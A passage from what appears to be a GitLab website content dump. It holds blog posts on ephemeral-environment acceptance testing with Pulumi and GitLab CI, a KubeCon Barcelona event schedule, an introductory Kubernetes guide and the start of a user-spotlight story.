Post","en-us/blog/katrin-contributor-post.yml","en-us/blog/katrin-contributor-post",{"_path":3547,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3548,"content":3553,"config":3559,"_id":3561,"_type":14,"title":3562,"_source":16,"_file":3563,"_stem":3564,"_extension":19},"/en-us/blog/kubecon-na-2019-are-you-about-to-break-prod",{"title":3549,"description":3550,"ogTitle":3549,"ogDescription":3550,"noIndex":6,"ogImage":1211,"ogUrl":3551,"ogSiteName":673,"ogType":674,"canonicalUrls":3551,"schema":3552},"KubeCon NA: Are you about to break Prod?","Use Pulumi and GitLab to build a pipeline that validates your application, infrastructure, and deployment process.","https://about.gitlab.com/blog/kubecon-na-2019-are-you-about-to-break-prod","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"KubeCon NA: Are you about to break Prod?\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Erin Krengel, Pulumi\"}],\n        \"datePublished\": \"2020-01-27\",\n      }",{"title":3549,"description":3550,"authors":3554,"heroImage":1211,"date":3556,"body":3557,"category":10,"tags":3558},[3555],"Erin Krengel, Pulumi","2020-01-27","\n\nA couple of months ago, my [Pulumi](https://www.pulumi.com/) colleague Sean Holung, staff sofware engineer, and I had the opportunity to present [\"Are you about to break prod? Acceptance Testing with Ephemeral Environments\"](https://www.youtube.com/watch?v=jAQhDZiRzBQ) at KubeCon NA 2019. In this talk, we covered what is an ephemeral environment, how to create one, and then we walked the audience through a concrete example. Given our limited time, we had to move quickly through a ton of information. This post will recap our presentation and add a few more details we weren't able to cover.\n\nAs software engineers, our job is to deliver business value. 
To do this, we need to be delivering software both quickly and reliably.\n\nSo the question we ask you is: are you about to break prod? Everyone will break production at some point because there are things we miss. As independent software lead Alexandra Johnson sums up so well in a tweet: \"Failures are part of the cost of building and shipping large systems.\" Building a robust pipeline allows us to move quickly in the case of failure and gain confidence around making changes to our infrastructure and applications.\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n\u003Cblockquote class=\"twitter-tweet\">\u003Cp lang=\"en\" dir=\"ltr\">Big takeaway from \u003Ca href=\"https://twitter.com/hashtag/KubeCon?src=hash&amp;ref_src=twsrc%5Etfw\">#KubeCon\u003C/a>: none of us want to break prod, but failures are part of the cost of building and shipping large systems. Using tools like \u003Ca href=\"https://twitter.com/hashtag/AcceptanceTesting?src=hash&amp;ref_src=twsrc%5Etfw\">#AcceptanceTesting\u003C/a> (\u003Ca href=\"https://twitter.com/eckrengel?ref_src=twsrc%5Etfw\">@eckrengel\u003C/a>) and \u003Ca href=\"https://twitter.com/hashtag/ChaosEngineering?src=hash&amp;ref_src=twsrc%5Etfw\">#ChaosEngineering\u003C/a> (\u003Ca href=\"https://twitter.com/Ana_M_Medina?ref_src=twsrc%5Etfw\">@Ana_M_Medina\u003C/a>) can increase your confidence in your infrastructure changes!\u003C/p>&mdash; Alexandra Johnson (@alexandraj777) \u003Ca href=\"https://twitter.com/alexandraj777/status/1198373475049623552?ref_src=twsrc%5Etfw\">November 23, 2019\u003C/a>\u003C/blockquote> \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\nWith this in mind, we use Pulumi and GitLab to build a pipeline that validates both our application, infrastructure, and deployment process. \n\n## Ephemeral environments\n\nWhat is an ephemeral environment? 
It is a short-lived environment that mimics a production environment. To maintain agility, boundaries are defined in the environment to only encompass the first-level dependencies of the particular microservice that is being deployed. It means you don't have to spin up every single microservice or piece of infrastructure that's running in production. Yet you may need to spin up extra pieces of infrastructure to properly test the microservice. For example, you may need to create a subscription to pull from a PubSub topic your microservice writes to. This subscription would allow your acceptance tests to pull from a topic in order to validate an outbound message is published.\n\n## Why this is important\n\nInfrastructure is a key part of an application's behavior. The architecture and requirements are continually evolving. How can you incorporate these into a testing suite to give us a high degree of confidence?\n\nEphemeral environments allow you to integrate infrastructure and deployment processes into a testing suite. They ensure your testing environment is always in-sync with production and therefore allow you to iterate quickly to meet new requirements.\n\nEphemeral environments also encourage you to lean on automated tests over manual tests. If you use ephemeral environments as a replacement for a testing environment, there is not enough time to go in and run a manual check. Shifting your mindset to automated tests can be challenging, yet it's imperative that we do so. Automated tests guarantee your application behaves as expected today as well as months from now when you're out on vacation.\n\n## Our demo application\n\nTo demonstrate the effectiveness of integrating acceptance testing with ephemeral environments into your deployment process, we created a simple demo application. The service is written in Go and accepts a message on the `/message` endpoint, then places it in a storage bucket and sends a notification about the new object on a PubSub topic. 
The code for this application lives in our [main.go](https://gitlab.com/rocore/demo-app/blob/master/main.go) file. While you can walk through this code yourself, the most important thing to call out is that our application is *configurable*. This means we take configuration in at the very beginning of our main function and shut down the application if the values are not present.\n\n```go\nfunc main() {\n    ...\n\t// Get configuration from environment variables. These are\n\t// required configuration values, so we use an helper\n\t// function get the values and exit if the value is not set.\n\tproject := getConfigurationValue(\"PROJECT\")\n\ttopicName := getConfigurationValue(\"TOPIC\")\n\tbucketName := getConfigurationValue(\"BUCKET\")\n    ...\n}\n\nfunc getConfigurationValue(envVar string) string {\n\tvalue := os.Getenv(envVar)\n\tif value == \"\" {\n\t\tlog.Fatalf(\"%s not set\", envVar)\n\t}\n\tlog.Printf(\"%s: %s\", envVar, value)\n\treturn value\n}\n```\n\n### Infrastructure\n\nThere are many pieces of infrastructure to spin up and we can use Pulumi to easily wire it all together. Our architecture looks like this:\n\n![Pulumi Architecture](https://about.gitlab.com/images/blogimages/pulumidemoarch.jpg){: .medium.center}\n\nYou can check out the Pulumi code that we use to reproduce both our ephemeral environments as well as production in the [infrastructure/index.ts](https://gitlab.com/rocore/demo-app/blob/master/infrastructure/index.ts) file. The neat thing about using Pulumi is that we can create the Google Cloud Platform (GCP) resources we need and then directly reference them in our Kubernetes deployment. 
Using Pulumi ensures we're always configuring our application with the correct GCP resources for that environment.\n\nFor example, in our Kubernetes deployment, we set the environment variables by using the topic and bucket variables created just above.\n\n```typescript\n// Create a K8s Deployment for our application.\nconst appLabels = { appClass: name };\nconst deployment = new k8s.apps.v1.Deployment(name, {\n    metadata: { labels: appLabels },\n    spec: {\n        selector: { matchLabels: appLabels },\n        template: {\n            metadata: { labels: appLabels },\n            spec: {\n                containers: [{\n                    ...\n                    env: [\n                        { name: \"TOPIC\", value: topic.name }, // referencing topic just created\n                        { name: \"BUCKET\", value: bucket.name }, // referencing bucket just created\n                        { name: \"PROJECT\", value: project },\n                        {\n                            name: \"GOOGLE_APPLICATION_CREDENTIALS\",\n                            value: \"/var/secrets/google/key.json\"\n                        },\n                    ],\n                    ...\n                }]\n            }\n        }\n    },\n});\n```\n\n### Acceptance tests\n\nThe acceptance tests validate that our service, when stood up, functions as expected. They are run against an ephemeral environment. The tests live in the `acceptance/acceptance_test.go` [file](https://gitlab.com/rocore/demo-app/blob/master/acceptance/acceptance_test.go). You'll notice we're once again using the helper function `getConfigurationValue`. Our acceptance test must also be configured to ensure they're validating against the correct resources for that particular ephemeral environment.\n\nSince the service is only accessible from within the Kubernetes cluster, we use a Kubernetes job to run our acceptance tests. 
Using a Kubernetes job is a good technique to use when your CI is running externally, such as from GitLab, and you do not want to expose your service publicly. Our ephemeral environment plus acceptance test looks like this:\n\n![Acceptance Tests](https://about.gitlab.com/images/blogimages/pulumiacceptancetestarch.jpg){: .medium.center}\n \nWe spin up a Kubernetes Job and additional resources by using an if statement at the bottom of our `infrastructure/index.ts` file. The conditional depends on the environment's name as follows:\n\n```typescript\n// If it's a test environment, set up acceptance tests.\nlet job: k8s.batch.v1.Job | undefined;\nif (ENV.startsWith(\"test\")) {\n    job = acceptance.setupAcceptanceTests({\n        ...\n    });\n}\n\n// Export the acceptance job name, so we can get the logs from our\n// acceptance tests.\nexport const acceptanceJobName = job ? job.metadata.name : \"unapplicable\";\n```\n\nThat covers all the major aspects of our application and infrastructure, and if you'd like to view the code in detail, it is available in our `demo-app` [GitLab repository](https://gitlab.com/rocore/demo-app).\n\n## Our pipeline\n\nWhen developing a new service, we must establish a solid deployment strategy upfront. We want to make sure we're building in quality from day one. As we develop the service, we can add acceptance tests for every feature we add while the context and requirements are still fresh in our minds. This ensures we have thorough coverage of our app's functionality.\n\nWe used GitLab to set up our pipeline. We chose GitLab because it's straightforward to set up and allows us to run our pipeline on our Docker image of choice. We use a [base-image](https://gitlab.com/rocore/global-infra/blob/master/base-image/Dockerfile) that has all our dependencies installed and then reference that Docker image and tag in our `demo-app` pipeline. 
The Docker image allows us to bundle and version the dependencies for building our application and infrastructure.\n\n![GitLab Pipelines](https://about.gitlab.com/images/blogimages/pulumibloggitlabci.png){: .shadow.medium.center}\n \n1. **Test and Build** - This runs our unit tests and builds both our application and acceptance test images. To build our images, we used [Kaniko](https://github.com/GoogleContainerTools/kaniko), a tool for building images within a container or Kubernetes cluster. GitLab has excellent documentation on [how to incorporate Kaniko](https://docs.gitlab.com/ee/ci/docker/using_kaniko.html) into your pipeline. The application image is an immutable image that is used for both running our acceptance tests and deploying to production.\n1. **Acceptance Test** - This is what spins up our ephemeral environments and runs our acceptance tests. This acts as a quality gate catching issues before production.\n\n    Our ephemeral environment and Kubernetes job are all spun up in the `script` portion of the acceptance test job definition. We do a bit of setup for our new acceptance test stack and then run `pulumi up`. Here is the print out from our acceptance tests.\n\n    ```bash\n    ...\n    $ pulumi stack init rocore/$ENV-app\n    Logging in using access token from PULUMI_ACCESS_TOKEN\n    Created stack 'rocore/test-96425413-app'\n    $ pulumi config set DOCKER_TAG $DOCKER_TAG\n    $ pulumi config set ENV $ENV\n    $ pulumi config set gcp:project rocore-k8s\n    $ pulumi config set gcp:zone us-west1-a\n    $ pulumi up --skip-preview\n    Updating (rocore/test-96425413-app):\n    ...\n    Resources:\n        + 16 created\n\n    Duration: 4m10s\n\n    Permalink: https://app.pulumi.com/rocore/demo-app/test-96425413-app/updates/1\n    ```\n\n    The `after_script` destroys our stack as well as prints the logs of both our Kubernetes job and deployment, which help with debugging if our tests were to fail. 
We use the `after_script` to make sure that we always clean up and print logs even when our acceptance tests fail.\n    \n    ```bash\n    ...\n    $ pulumi stack select rocore/$ENV-app\n    $ kubectl logs -n rocore --selector=appClass=$ENV-demo-app-acc-test --tail=200\n    === RUN   TestSimpleHappyPath\n    === RUN   TestSimpleHappyPath/message_is_sent_to_PubSub_topic\n    === RUN   TestSimpleHappyPath/message_is_stored_in_bucket\n    ",[953,1038,9,109,231,277],{"slug":3560,"featured":6,"template":689},"kubecon-na-2019-are-you-about-to-break-prod","content:en-us:blog:kubecon-na-2019-are-you-about-to-break-prod.yml","Kubecon Na 2019 Are You About To Break Prod","en-us/blog/kubecon-na-2019-are-you-about-to-break-prod.yml","en-us/blog/kubecon-na-2019-are-you-about-to-break-prod",{"_path":3566,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3567,"content":3573,"config":3578,"_id":3580,"_type":14,"title":3581,"_source":16,"_file":3582,"_stem":3583,"_extension":19},"/en-us/blog/kubernetes-kubecon-barcelona",{"title":3568,"description":3569,"ogTitle":3568,"ogDescription":3569,"noIndex":6,"ogImage":3570,"ogUrl":3571,"ogSiteName":673,"ogType":674,"canonicalUrls":3571,"schema":3572},"See you at KubeCon Barcelona!","We're excited to see you all in Barcelona! Visit us at booth S21.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749664107/Blog/Hero%20Images/tanuki-adventure.png","https://about.gitlab.com/blog/kubernetes-kubecon-barcelona","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"See you at KubeCon Barcelona!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Priyanka Sharma\"}],\n        \"datePublished\": \"2019-05-17\",\n      }",{"title":3568,"description":3569,"authors":3574,"heroImage":3570,"date":3575,"body":3576,"category":10,"tags":3577},[1032],"2019-05-17","\nKubeCon is here again! 
I am very excited to go to Barcelona and meet (some of) the 12,000 attendees expected at the show. I’ve been part of KubeCon since the second event when there were 700 attendees. That year, we were a cozy community with about five projects, and Kubernetes was the newest game in town. Fast forward to today and I now serve on the board of the CNCF, Kubernetes is a stable technology, the foundation hosts 36 projects, and the latest of them to graduate will be Fluentd (after Kubernetes, Prometheus, CoreDNS, Envoy, and Containerd). I can’t quite reveal it yet, but there will be a very cool GitLab story intertwined with one of the projects that you will see for yourself soon :-).\n\n\u003Cscript type=\"text/javascript\" src=\"https://ssl.gstatic.com/trends_nrtr/1754_RC01/embed_loader.js\">\u003C/script> \u003Cscript type=\"text/javascript\"> trends.embed.renderExploreWidget(\"TIMESERIES\", {\"comparisonItem\":[{\"keyword\":\"kubernetes\",\"geo\":\"\",\"time\":\"today 5-y\"}],\"category\":0,\"property\":\"\"}, {\"exploreQuery\":\"date=today%205-y&q=kubernetes\",\"guestPath\":\"https://trends.google.com:443/trends/embed/\"}); \u003C/script>\n*\u003Csmall>Kubernetes growth over the past 5 years.\u003C/small>*\n\nAs some of you know, I joined GitLab after following the company and our CEO, Sid Sijbrandij, for a long time. Working at this dynamic company has been a ride of a lifetime. I am an open source person and one of the interesting things for me is how the [GitLab story](/company/history/) is similar to the Kubernetes story. GitLab started as an open source git provider because our co-founder, [Dmitriy \"DZ\" Zaphorozhets](/company/team/#dzaporozhets) didn’t like his options. Today, we have morphed into a [single application for the entire DevOps lifecycle](/stages-devops-lifecycle/). Similarly, Kubernetes comes from humble beginnings. 
In the words of Joe Beda, co-founder of Kubernetes, “there were a set of us that just wanted to be able to hack on some stuff and not have to go through all the process of shipping stuff to Google...it was more important for us to sort of reset the playing field between clouds. And so Kubernetes became a way for us to start doing that.”\n\nIt’s exciting to watch Kubernetes grow into the default container orchestration platform but I believe the best is yet to come: When the technology truly shifts left and every developer has access to it. That’s where GitLab comes in. With it’s deep focus on the developer workflow, the product brings efficiency, collaboration, and governance to teams sprawling the world wide web (a la GitLab itself) or small groups working out of a garage. When everything’s in the MR, everything is accessible including details on your kubernetes pods. I invite you to learn more about how we [integrate with Kubernetes](/solutions/kubernetes/).\n\n> “The only way in my opinion to make it easier for most end users to have a \"cloud-native\" experience is to provide a more end-to-end platform, a way that people can come together and they can edit code and review code and then actually do CI on that code and get that code shipped out to containers and have it be run with appropriate load balancing and observability.” — Matt Klein, Systems Engineer at Lyft\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/w0cZuG2Fcwo\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n*\u003Csmall>Video directed and produced by [Aricka Flowers](/company/team/#arickaflowers).\u003C/small>*\n\n## Let's connect!\n\n[Meet us at booth S21](https://about.gitlab.com/events/kubecon/) for CI office hours, tanuki adventures, and iPad giveaways!\n\nI'd love to help any CNCF projects (and other folks!) consider [GitLab CI](/solutions/continuous-integration/). 
If you are interested, [DM me on Twitter](https://twitter.com/pritianka) and we can sit down and discuss.\n\n## Join us for these events\n\n### Monday, May 20\n\n#### Cloud-Native Transformation Summit Hosted by Sysdig | 9:00 am - 12:15 pm\n\nJoin Priyanka Sharma, Director of Technical Evangelism at GitLab, at this zero day KubeCon event. This event will look at how enterprise organizations are moving into production-level Kubernetes and transforming their applications and infrastructure operations into Cloud-Native technologies.\n[Learn more here](https://go.sysdig.com/cloud_native_transformation_summit_2019.html).\n\n#### Zero Trust in the Cloud Native Era at Cloud Native Security Day | 11:00 - 11:30 am\n\nPriyanka Sharma, Director of Technical Evangelism at GitLab covers zero trust in the era of cloud native. [Register here](https://go.twistlock.com/cloudnativesecurityday#agenda).\n\n#### The Future of CI/CD with Kubernetes | 2:40 - 3:20 pm\n\nJoin Dan Lorenc, Software Engineer at Google, Carlos Sanchez, Principal Software Engineer at CloudBees, and Priyanka Sharma, Director of Technical Evangelism at GitLab, and Rob Zuber, CTO at CircleCI for a discussion on the future of CI/CD with Kubernetes.[Learn more here](https://sched.co/N6FQ).\n\n#### Barcelona Free Software Meetup: Working in the Open with GitLab, Kubic with openSUSE | 7-9 pm\n\nJoin Jason Plum, a Senior Software Engineer, Distribution at GitLab, for a talk on GitLab’s open-core product. He’ll discuss contributing back to the community directly, as well as sharing insights on changing from Closed to Open.\n[RSVP here](https://www.meetup.com/Barcelona-Free-Software/events/260656266/).\n\n### Tuesday, May 21\n\n#### Tutorial: Cloud-Agnostic Serverless - Sebastien Goasguen, TriggerMesh & Priyanka Sharma, GitLab | 11:05 am - 12:30 pm\n\nIn this tutorial, we will leverage Knative, Google's Kubernetes-based open source platform to build, deploy, and manage modern serverless workloads. 
We will push serverless functions and apps to production on any cloud of choice and switch the provider as necessary. We will leverage GitLab and TriggerMesh technology in the tutorial and also share how developers can use other options.\nSign up for the tutorial through the KubeCon schedule [here](https://sched.co/MPgx).\n\n#### Multicloud 360 Event | 8:30 pm - Midnight\n\nJoin GitLab, Upbound, DigitalOcean, Google Cloud and CockroachDB for 360 views of Barcelona and a discussion of multicloud. [RSVP here](https://www.eventbrite.com/e/multicloud-360-tickets-60623662005) to reserve your spot.\n\n### Wednesday, May 22\n\n#### The Serverless Landscape and Event Driven Futures - Dee Kumar, Linux Foundation & Priyanka Sharma, GitLab | 2:00 -2:35 pm\n\nThere is a lot of curiosity and confusion around [serverless computing](/topics/serverless/). What is it? Who is it for? Is it a replacement for IaaS, PaaS, and containers? Does that mean the days of servers are over? The CNCF created the Serverless Working Group to explore the intersection of cloud native and serverless technology. [Learn more here](https://sched.co/MPeI).\n\n## Play #tanukiadventure\n\nJoin our #tanukiadventure! Grab your game card at our booth S21 to help guide your adventure in finding GitLab's partners. At each adventure stop, learn how they work with GitLab! Once complete, each partner will provide you with an exclusive GitLab collectible pin to celebrate our awesome partnership! 
The first 50 attendees to collect all 8 unique Tanuki pins will win our prized GitLab Tanuki hoodie!\n",[909,845,277,1038,9],{"slug":3579,"featured":6,"template":689},"kubernetes-kubecon-barcelona","content:en-us:blog:kubernetes-kubecon-barcelona.yml","Kubernetes Kubecon Barcelona","en-us/blog/kubernetes-kubecon-barcelona.yml","en-us/blog/kubernetes-kubecon-barcelona",{"_path":3585,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3586,"content":3592,"config":3599,"_id":3601,"_type":14,"title":3602,"_source":16,"_file":3603,"_stem":3604,"_extension":19},"/en-us/blog/kubernetes-the-container-orchestration-solution",{"title":3587,"description":3588,"ogTitle":3587,"ogDescription":3588,"noIndex":6,"ogImage":3589,"ogUrl":3590,"ogSiteName":673,"ogType":674,"canonicalUrls":3590,"schema":3591},"Kubernetes: Get to know the container orchestration solution","Kubernetes, also known as K8s, is a must-have solution for deploying and maintaining applications, especially in the cloud. Learn the basics of Kubernetes with this introductory guide.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749660215/Blog/Hero%20Images/kubernetes-container-orchestration-solution.jpg","https://about.gitlab.com/blog/kubernetes-the-container-orchestration-solution","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Kubernetes: Get to know the container orchestration solution\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab Team\"}],\n        \"datePublished\": \"2024-07-25\",\n      }",{"title":3587,"description":3588,"authors":3593,"heroImage":3589,"date":3595,"body":3596,"category":10,"tags":3597,"updatedDate":3598},[3594],"GitLab Team","2024-07-25","Kubernetes automates the tasks of deploying and managing containerized applications on a large scale. 
Over time, Kubernetes has become an essential tool for developing applications in many areas, such as [microservices](https://about.gitlab.com/topics/microservices/), web applications, and databases. Its performance and scalability make it a recognized standard in container management today.\n\nDiscover everything you need to know about Kubernetes in this article.\n\n## What is Kubernetes?\n\nKubernetes is an open-source system for efficiently orchestrating the containers of a software application. Containerization is a widely acclaimed approach to developing applications, especially in the areas of digital transformation and the cloud.\n\nIf you're not familiar with the concept of containers, note that it is an application development method that groups the components of an application into standardized units – or containers – that are independent of the devices and operating systems they are located on. By isolating applications from their environment, this technology facilitates their deployment and portability, as well as reduces interoperability conflicts.\n\nThis is where we use the Kubernetes software. Certainly, containers allow applications to be divided into smaller and autonomous modules, thus facilitating their deployment. However, for containers to interact within an application, a management system encompassing these modules is necessary. That's exactly what Kubernetes does. Kubernetes provides a platform to control where and how containers run, so you can orchestrate and schedule their execution to manage containerized applications on a large scale.\n\n> Browse [GitLab articles about Kubernetes](https://about.gitlab.com/blog/tags/kubernetes/).\n\n## How does a Kubernetes architecture work?\n\nTo understand how a Kubernetes architecture works, it is essential to become familiar with certain concepts, starting with that of the cluster, which is the most extensive within the architecture. 
A Kubernetes cluster is defined as the set of virtual or physical machines on which a containerized application is installed.\n\n![Components of Kubernetes](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749673941/Blog/Content%20Images/components-of-kubernetes.png)\n\nSource: [Kubernetes](https://kubernetes.io/docs/concepts/overview/components/).\n\nThis cluster comprises different elements:\n- Node: This is a work unit in a Kubernetes cluster. It is a virtual or physical machine that performs tasks on behalf of the application.\n- Pod: A pod is the smallest deployable unit in Kubernetes. It is a group of containers working together on the same node. Containers inside a pod share the same network and can communicate with each other via localhost.\n- Service: A Kubernetes service exposes a pod to the network or other pods. It offers a stable and well-defined access point to applications hosted by pods.\n- Volume: A folder abstraction that solves problems of sharing and retrieving files within a container.\n- Namespace: A namespace allows you to group and isolate resources to form a virtual cluster.\n\nThe Kubernetes architecture is based on two main types of nodes: the master node and the worker nodes. The master node is responsible for the overall management of the Kubernetes cluster and communication with the worker nodes. Among its key components, the API is the central point of contact for all communications between users and the cluster. The [etcd](https://kubernetes.io/docs/concepts/overview/components/#etcd) is the key-value database where the configurations, the system state and the object metadata, are stored. The controller manager coordinates background operations such as pod replication, and the scheduler places pods on nodes based on available resources.\n\nWorker nodes, on the other hand, are the machines that run and manage the applications contained in the pods. 
Within them, the [kubelet](https://kubernetes.io/docs/concepts/overview/components/#kubelet) is the agent that runs on each node and communicates with the master to receive the commands and transmit the status of the pods. The network proxy or [kube-proxy](https://kubernetes.io/docs/concepts/overview/components/) maintains network rules on nodes to allow access to services from outside the Kubernetes cluster. Finally, the container runtime is the software responsible for the execution and management of containers within the pods.\n\n### Docker's role\n\nAmong all the components of a K8s cluster, the choice of runtime within the worker nodes is important. Different software is available for this, such as rkt or CRI-O, but Docker is the most commonly used tool.\n\n### What is the difference between Docker and Kubernetes?\n\nDocker is an open-source solution that is specifically used at the container level. It allows containers to be packaged in a standardized and lightweight format, which increases their portability in different environments. It is therefore a complementary tool to K8s that facilitates the management of containers themselves, while Kubernetes simplifies their integration and communication within the application.\n\n## What are the benefits of Kubernetes?\n\nLaunched by Google in 2014, the first stable version of Kubernetes appeared in July 2015. Since then, the popularity of this software has not wavered, making K8s a benchmark in the field of container orchestration, especially for microservice-oriented architectures. So then, why use Kubernetes? 
This success is primarily due to the excellent performance of this software in container orchestration.\n\nThe benefits of Kubernetes are plenty, as follows:\n- Automation: Kubernetes facilitates the automation of tasks related to the deployment, scaling, and updating of containerized applications.\n- Flexibility: The software adapts to different container technologies, as well as various hardware architectures and operating systems.\n- Scalability: K8s facilitates the deployment and management of thousands of containers, regardless of their status: running, paused, or stopped.\n- Migration: It is possible to easily migrate applications to Kubernetes without having to change the source code.\n- Multi-cluster support: Kubernetes centrally manages multiple container clusters distributed across different infrastructures.\n- Update management: The software supports rolling update deployments to update applications without service disruption.\n\n## A robust and scalable ecosystem\n\nKubernetes stands out for its ability to manage containers efficiently and securely, while maintaining its independence from cloud infrastructure providers. Its modular architecture adapts to the specific needs of each company and supports a very wide range of applications and services (web services, data processing, mobile applications, etc.).\n\nIn the race for digital transformation, Kubernetes also wins over people, thanks to its rich and scalable ecosystem within the open-source community. Managed by the Cloud Native Computing Foundation ([CNCF](https://www.cncf.io/)), K8s is supported by thousands of developers around the world. They contribute to the development of the project and the continuous improvement of its features.\n\n## What are the limitations of Kubernetes?\n\nThe benefits of Kubernetes make it a safe choice for many development teams in the cloud-native application space. Nevertheless, it is worth pointing out some of its limitations. 
Kubernetes requires a solid technical background and training in new development concepts and methods. The software can be complex to configure at the beginning of a project. However, configuration is crucial, especially to secure the platform. Having an experienced development team for K8s projects is therefore a significant asset.\n\nAnother challenge is the implementation and maintenance of a K8s architecture, which also requires time and resources, especially to update its various components and software. This raises the question of possible oversizing. In the case of a small application, or a project with no particular challenge in terms of scalability, a more basic architecture may suffice while being more economical.\n\n## Using Kubernetes within your teams\n\nTens of thousands of companies have adopted a Kubernetes architecture to carry out their digital transition. K8s is used by companies of all sizes, from startups to multinationals.\n\nThere are many examples of successful integrations, such as for Haven Technologies. Haven Technologies has migrated its SaaS services to K8s and relies in particular on a Kubernetes strategy with the GitLab DevSecOps platform to help its teams improve efficiency, security, and speed of software development. Check out [our client story](https://about.gitlab.com/customers/haven-technologies/) to learn more!\n\n## Kubernetes, Git, and GitLab\n\nKubernetes, Git, and GitLab are essential elements of the DevOps landscape. 
Kubernetes offers great flexibility to deploy and manage the various components of an application, while GitLab, which is built around Git and its native version control system, allows rigorous and accurate tracking of source code and changes, while providing a comprehensive suite of tools to manage the entire software development lifecycle.\n\nThis combination, together with a [GitOps approach](https://about.gitlab.com/topics/gitops/), which aims to automate the provisioning of modern cloud infrastructures, creates an agile environment for application development and deployment, thus making it possible to provide powerful, flexible, and scalable software. For more details, discover all [GitLab solutions to launch an application with Kubernetes](https://about.gitlab.com/solutions/kubernetes/).\n\n## Kubernetes FAQ\n### What are the competing solutions to K8s?\n\nThere are several alternatives to Kubernetes, including Docker Swarm, and Marathon. However, Kubernetes is considered the most mature and popular solution on the market. Its broad user base, abundant documentation, and active community support make Kubernetes an excellent choice for those looking to adopt a container orchestration system.\n\n### What is a Kubernetes cluster?\n\nA Kubernetes cluster is composed of a master node and several worker nodes. The master node is responsible for coordinating the tasks in the cluster, while the worker nodes execute these orchestration tasks and host the containers. K8s clusters are highly scalable – nodes can be added or removed to adapt cluster resources to the needs of the application.\n\n### How to get started with Kubernetes?\n\nTo begin, it is necessary to install the Kubernetes software on a compatible environment (Linux, macOS, or Windows). Kubernetes can be installed in a traditional hosting environment, but also in a cloud environment (Google Kubernetes Engine or Amazon EKS, for example). 
Users can download and install Kubernetes directly from their official site, and then proceed with the initial configuration necessary to connect the master and worker nodes. Once this step is completed, users are ready to deploy a first application using Kubernetes.\n\n### Why choose Kubernetes?\n\nKubernetes offers great flexibility and total portability between different cloud platforms or on-site infrastructures. By automating orchestration tasks, K8s helps to optimize resources, reduce operating costs, and free up time for developers and system administrators. Finally, the Kubernetes ecosystem is vast and is continuously developed by a large open-source community, enabling rapid innovation.\n\n## Learn more\n\n- [How to stream logs through the GitLab Dashboard for Kubernetes](https://about.gitlab.com/blog/how-to-stream-logs-through-the-gitlab-dashboard-for-kubernetes/)\n- [Kubernetes overview: Operate cluster data on the frontend](https://about.gitlab.com/blog/kubernetes-overview-operate-cluster-data-on-the-frontend/)\n- [Simplify your cloud account management for Kubernetes access](https://about.gitlab.com/blog/simplify-your-cloud-account-management-for-kubernetes-access/)\n",[1038,9],"2024-08-22",{"slug":3600,"featured":6,"template":689},"kubernetes-the-container-orchestration-solution","content:en-us:blog:kubernetes-the-container-orchestration-solution.yml","Kubernetes The Container Orchestration Solution","en-us/blog/kubernetes-the-container-orchestration-solution.yml","en-us/blog/kubernetes-the-container-orchestration-solution",{"_path":3606,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3607,"content":3613,"config":3619,"_id":3621,"_type":14,"title":3622,"_source":16,"_file":3623,"_stem":3624,"_extension":19},"/en-us/blog/leah-petersen-user-spotlight",{"title":3608,"description":3609,"ogTitle":3608,"ogDescription":3609,"noIndex":6,"ogImage":3610,"ogUrl":3611,"ogSiteName":673,"ogType":674,"canonicalUrls":3611,"schema":3612},"From motorcycle stunter 
to DevOps: Finding love for CI/CD","Switching to GitLab helped a newly minted DevOps engineer grasp the concept of CI/CD.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663760/Blog/Hero%20Images/image-for-leah-post.jpg","https://about.gitlab.com/blog/leah-petersen-user-spotlight","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Motorcycle stunter turned DevOps engineer says GitLab helped her learn to \\\"love\\\" CI/CD\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Aricka Flowers\"}],\n        \"datePublished\": \"2018-06-21\"\n      }",{"title":3614,"description":3609,"authors":3615,"heroImage":3610,"date":3616,"body":3617,"category":682,"tags":3618},"Motorcycle stunter turned DevOps engineer says GitLab helped her learn to \"love\" CI/CD",[2071],"2018-06-21","\nWhen professional motorcycle stuntwoman turned developer Leah Petersen switched from Jenkins to GitLab, she was a bit nervous to say the least. Having only worked in tech for nine months, the [Samsung SDS](https://www.samsungsds.com/us/en/index.html) engineer was not enthused about the prospect of having to learn a new application after feeling like she had “just started to get competent” with Jenkins.\n\nAfter a self-described mini pity party, she dove into GitLab head first, jumping into a few big ticket projects to get a handle on the landscape. 
